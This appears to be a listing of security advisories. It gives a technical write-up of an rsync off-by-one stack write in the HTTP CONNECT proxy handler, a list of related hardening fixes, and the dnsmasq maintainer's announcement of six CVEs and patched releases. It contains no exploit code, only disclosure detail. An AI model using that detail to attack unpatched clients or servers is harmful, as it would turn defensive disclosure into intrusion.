CVE-2026-45232 (CVSS v3.1 3.1, LOW): Off-by-one out-of-bounds stack write in the rsync client's HTTP CONNECT proxy handler (establish_proxy_connection() in socket.c). After issuing the CONNECT request, rsync read the proxy's first response line one byte at a time into a 1024-byte stack buffer with the bound cp < &buffer[sizeof buffer - 1]. If the proxy (or a MITM in front of it) returned 1023+ bytes on that first line without a newline terminator, cp exited the loop pointing at a buffer slot the loop never wrote, leaving *cp holding stale stack data from the earlier snprintf() of the outgoing CONNECT request. The post-loop logic then wrote a single \0 one byte past the end of the buffer on the stack. Reach is client-side only, and only when RSYNC_PROXY is set so rsync tunnels an rsync:// connection through an HTTP CONNECT proxy. The written byte is always \0 and the offset is fixed by the buffer size, not attacker-chosen, so this is not an arbitrary-write primitive: practical impact is corruption of one adjacent stack byte and possible later misbehaviour or crash. The fix detects the "buffer filled without finding \n" case explicitly by position and refuses the response with "proxy response line too long". Reported by Aisle Research via Michal Ruprich (rsync-3.4.1-2.el10 QE).

In addition to the six CVE fixes, this release adds defence-in-depth hardening on several adjacent paths: bounded wire-supplied counts and lengths in flist/io/acls/xattrs, a guard against length underflow in cumulative snprintf() callers, a parent block-index bounds check on the receiver, a NULL check in read_delay_line(), a lower ceiling on MAX_WIRE_DEL_STAT to avoid signed-int overflow in the read_del_stats() accumulator, rejection of hyphen-prefixed remote-shell hostnames (defence-in-depth against argv-injection in tooling that forwards untrusted input into the hostspec position; reported by Aisle Research via Michal Ruprich), and a NULL-check on localtime_r() in timestring() to keep a malicious server from crashing the client by advertising a file with an out-of-range modtime.


Related vulnerabilities: CVE-2026-43618CVE-2024-12086CVE-2026-45232CVE-2026-43620CVE-2026-43619CVE-2026-43617CVE-2026-29518

Today, 11th May 2026 CERT is releasing a set of six CVEs for serious security vulnerabilities in dnsmasq. These are all long-standing bugs which apply to pretty much all non-ancient versions. The CVE has been pre-disclosed to vendors, so hopefully they will be releasing patched versions of their dnsmasq packages in a timely manner.

Details and patches are available on the website at

https://thekelleys.org.uk/dnsmasq/CVE/

and I have made "2.92rel2" release of the current 2.92 dnsmasq stable release which is downloadable from the usual place and has had these patches applied.

At the same time, the commits which fix these bugs in the development tree will be uploaded. Some of these use the same patches as the backports, but some are more comprehensive re-writes to tackle root-causes.

There has been something of a revolution in AI-based security research, and I've spent a lot of time over the last couple of months dealing with bug reports, weeding duplicates (so many duplicates!) and triaging bugs into those which need vendor pre-disclosure and those which it's better to make public and fix immediately. Those judgements have been necessarily subjective, but given the number of times "good guys" have found these bugs, there's no doubt that "bad guys" have been able to do the same, so long embargoes seem kind of pointless. There's also the problem that the amount of time and effort, for all actors, needed to co-ordinate an embargo and provide backports is huge. I think the priority for most bugs is to fix them going forward, and have new dnsmasq releases as bug-free as possible. To this end, you may have noticed that there have been a lot of security-fix commits to the git repo in the weeks prior to this announcement.

I will shortly tag dnsmasq-2.93rc1 and the aim is to get a stable 2.93 release done ASAP. Testing of release candidate by members here is important and I'd like to encourage anyone who can to do that as soon as they can. With luck, 2.93 could be out in a week or so.

The tsunami of AI-generated bug reports shows no signs of stopping, so it is likely that this process will have to be repeated again soon. There's a tension between getting as much as possible of the ongoing bug stream fixed in 2.93 and it's timely release. I plan to prioritise timeliness, and keep working after that as necessary.


Related vulnerabilities: CVE-2026-4892CVE-2026-2291CVE-2026-4891CVE-2026-5172CVE-2026-4890CVE-2026-4893

displaying 1 - 10 bundles in total 139